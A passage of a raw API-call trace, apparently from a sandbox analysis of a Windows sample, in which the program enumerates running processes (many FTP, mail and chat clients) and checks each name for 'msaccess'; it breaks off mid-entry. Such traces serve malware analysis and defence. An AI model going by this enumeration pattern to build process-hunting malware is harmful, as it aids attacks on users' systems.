lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0097.151] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0097.151] StrStrIA (lpFirst="opens-versions.exe", lpSrch="msaccess") returned 0x0 [0097.151] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0097.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0097.153] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b488 [0097.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x356b488, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0097.153] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0097.153] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="msaccess") returned 0x0 [0097.153] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0097.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.154] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3576478 [0097.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3576478, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0097.154] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0097.154] StrStrIA (lpFirst="3dftp.exe", lpSrch="msaccess") returned 0x0 [0097.154] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0097.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0097.156] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575820 [0097.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x3575820, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0097.156] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0097.156] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="msaccess") returned 0x0 [0097.156] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0097.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.157] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3576448 [0097.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3576448, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0097.157] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0097.157] StrStrIA (lpFirst="alftp.exe", lpSrch="msaccess") returned 0x0 [0097.157] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0097.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.158] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3576640 [0097.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3576640, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0097.158] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0097.158] StrStrIA (lpFirst="barca.exe", lpSrch="msaccess") returned 0x0 [0097.158] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0097.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.160] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35765e0 [0097.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x35765e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0097.160] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0097.160] StrStrIA (lpFirst="bitkinex.exe", lpSrch="msaccess") returned 0x0 [0097.160] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0097.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.161] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576538 [0097.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3576538, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0097.162] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0097.162] StrStrIA (lpFirst="coreftp.exe", lpSrch="msaccess") returned 0x0 [0097.162] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0097.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0097.163] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574dd0 [0097.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3574dd0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0097.163] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0097.163] StrStrIA (lpFirst="far.exe", lpSrch="msaccess") returned 0x0 [0097.163] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0097.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.164] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3576550 [0097.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3576550, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0097.164] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0097.164] StrStrIA (lpFirst="filezilla.exe", lpSrch="msaccess") returned 0x0 [0097.164] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0097.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.166] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576568 [0097.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3576568, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0097.166] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0097.166] StrStrIA (lpFirst="flashfxp.exe", lpSrch="msaccess") returned 0x0 [0097.166] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0097.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.167] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3576628 [0097.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3576628, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0097.167] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0097.167] StrStrIA (lpFirst="fling.exe", lpSrch="msaccess") returned 0x0 [0097.167] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0097.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0097.168] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35754c0 [0097.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x35754c0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0097.168] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0097.168] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="msaccess") returned 0x0 [0097.169] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0097.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0097.170] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3575860 [0097.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x3575860, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0097.170] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0097.170] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="msaccess") returned 0x0 [0097.170] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0097.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0097.171] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574c90 [0097.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x3574c90, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0097.171] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0097.171] StrStrIA (lpFirst="icq.exe", lpSrch="msaccess") returned 0x0 [0097.171] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0097.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.172] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576580 [0097.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3576580, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0097.172] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0097.173] StrStrIA (lpFirst="leechftp.exe", lpSrch="msaccess") returned 0x0 [0097.173] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0097.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.174] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35765b0 [0097.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x35765b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0097.174] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0097.174] StrStrIA (lpFirst="ncftp.exe", lpSrch="msaccess") returned 0x0 [0097.174] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0097.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.182] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35765c8 [0097.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x35765c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0097.182] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0097.182] StrStrIA (lpFirst="notepad.exe", lpSrch="msaccess") returned 0x0 [0097.182] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0097.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.184] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35763a0 [0097.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x35763a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0097.184] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0097.184] StrStrIA (lpFirst="operamail.exe", lpSrch="msaccess") returned 0x0 [0097.184] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0097.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.185] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576658 [0097.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x3576658, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0097.185] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0097.185] StrStrIA (lpFirst="outlook.exe", lpSrch="msaccess") returned 0x0 [0097.185] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0097.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.186] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3576418 [0097.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3576418, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0097.186] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0097.186] StrStrIA (lpFirst="pidgin.exe", lpSrch="msaccess") returned 0x0 [0097.187] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0097.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.188] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3576688 [0097.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3576688, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0097.188] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0097.188] StrStrIA (lpFirst="scriptftp.exe", lpSrch="msaccess") returned 0x0 [0097.188] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0097.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.189] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3576430 [0097.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3576430, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0097.190] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0097.190] StrStrIA (lpFirst="skype.exe", lpSrch="msaccess") returned 0x0 [0097.190] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0097.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.191] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576400 [0097.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3576400, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 